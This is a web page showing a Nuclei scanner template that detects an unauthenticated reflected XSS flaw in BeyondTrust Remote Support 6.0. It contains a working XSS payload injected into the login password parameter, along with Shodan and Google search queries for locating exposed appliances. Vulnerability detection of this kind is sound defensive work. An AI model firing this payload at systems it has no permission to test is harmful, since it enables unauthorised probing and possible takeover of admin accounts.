Skip to content

BeyondTrust Remote Support 6.0 - Cross-Site Scripting

ID: beyond-trust-xss

Severity: medium

Author: r3Y3r53

Tags: beyondtrust,xss,intrusive

Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. Remote attackers could acheive full admin access to the appliance, by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint.

id: beyond-trust-xss
info:
name: BeyondTrust Remote Support 6.0 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. Remote attackers could acheive full admin access to the appliance, by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint.
reference:
- https://www.exploit-db.com/exploits/50632
classification:
cpe: cpe:2.3:a:beyondtrust:remote_support:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: beyondtrust
product: remote_support
shodan-query: html:"BeyondTrust"
google-query: intext:"BeyondTrust" "Redistribution Prohibited"
tags: beyondtrust,xss,intrusive
http:
- method: GET
path:
- "{{BaseURL}}/appliance/login?login[password]={{randstr}}%22%3E%3Csvg/onload=alert(document.domain)%3E&login[use_curr]=1&login[submit]=Change%20Password"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<svg/onload=alert(document.domain)>") && contains(body, "beyondtrust")'
condition: and
# digest: 490a0046304402201b0f9fd658c920e0625489d4c192f0709cb29e1d2d759ac3fb9ae2b1e98835180220537a39619f7e0956700ebc42a73e6309cce72cf7fad9603abe78af00e8328460:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/beyond-trust-xss.yaml"

View on Github